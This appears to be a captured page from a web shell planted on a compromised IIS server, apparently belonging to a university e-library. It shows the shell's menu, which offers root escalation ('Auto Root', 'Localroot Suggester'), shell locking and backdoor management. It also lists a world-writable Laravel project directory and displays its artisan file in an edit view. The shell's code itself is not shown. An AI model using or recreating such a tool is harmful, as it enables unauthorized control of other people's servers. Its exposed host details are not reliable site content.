Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 18.216.67.249
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
localhost /
grosir /
Delete
Unzip
Name
Size
Permission
Date
Action
.git
[ DIR ]
drwxrwxrwx
2023-10-14 14:19
.github
[ DIR ]
drwxrwxrwx
2023-05-09 14:49
app
[ DIR ]
drwxrwxrwx
2023-05-09 14:49
bootstrap
[ DIR ]
drwxrwxrwx
2023-05-09 14:49
config
[ DIR ]
drwxrwxrwx
2023-05-09 14:49
database
[ DIR ]
drwxrwxrwx
2023-05-09 14:49
drive-download-20230927T134214Z-001
[ DIR ]
drwxrwxrwx
2023-09-27 20:46
public
[ DIR ]
drwxrwxrwx
2024-08-22 20:18
resourcess
[ DIR ]
drwxrwxrwx
2024-04-13 05:51
routes
[ DIR ]
drwxrwxrwx
2024-02-29 00:30
storage
[ DIR ]
drwxrwxrwx
2023-05-09 14:49
tests
[ DIR ]
drwxrwxrwx
2023-05-09 14:49
vendor
[ DIR ]
drwxrwxrwx
2023-05-10 15:36
.env.example
668
B
-rw-rw-rw-
2023-05-09 14:49
.gitattributes
111
B
-rw-rw-rw-
2023-05-09 14:49
.gitignore
183
B
-rw-rw-rw-
2023-05-09 14:49
.htaccess
127
B
-rw-rw-rw-
2023-05-12 14:50
.travis.yml
197
B
-rw-rw-rw-
2023-05-09 14:49
LICENSE
1.04
KB
-rw-rw-rw-
2023-05-09 14:49
artisan
1.61
KB
-rw-rw-rw-
2023-05-09 14:49
composer.json
1.64
KB
-rw-rw-rw-
2023-05-09 14:49
composer.lock
231.92
KB
-rw-rw-rw-
2023-05-09 14:49
drive-download-20230927T134214Z-001.zip
18.5
MB
-rw-rw-rw-
2023-09-27 20:43
package.json
1.04
KB
-rw-rw-rw-
2023-05-09 14:49
phpunit.xml
1.13
KB
-rw-rw-rw-
2023-05-09 14:49
readme.md
5.54
KB
-rw-rw-rw-
2023-05-09 14:49
server.php
542
B
-rw-rw-rw-
2023-05-09 14:49
web.config
1.01
KB
-rw-rw-rw-
2023-09-10 21:42
webpack.mix.js
555
B
-rw-rw-rw-
2023-05-09 14:49
yarn.lock
202
KB
-rw-rw-rw-
2023-05-09 14:49
Save
Rename
#!/usr/bin/env php <?php /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any our classes "manually". Feels great to relax. | */ require __DIR__.'/bootstrap/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running. We will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);